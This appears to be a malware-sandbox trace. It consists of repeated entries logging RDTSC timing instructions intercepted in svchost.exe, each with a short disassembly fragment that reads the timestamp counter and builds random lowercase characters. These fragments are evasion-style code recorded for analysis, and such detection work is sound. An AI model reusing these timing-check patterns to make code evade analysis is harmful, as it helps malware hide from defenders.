Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F7F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA590F3h 0x00000031 call 2AA4FF96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA591D0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59193h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA591C4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59193h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F8F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59250h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59550h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4F7F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA591F5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA591D0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594B3h 0x00000033 call 2AA4FBB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59275h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59130h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59155h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA590F3h 0x00000033 call 2AA4F7D6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4F876h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
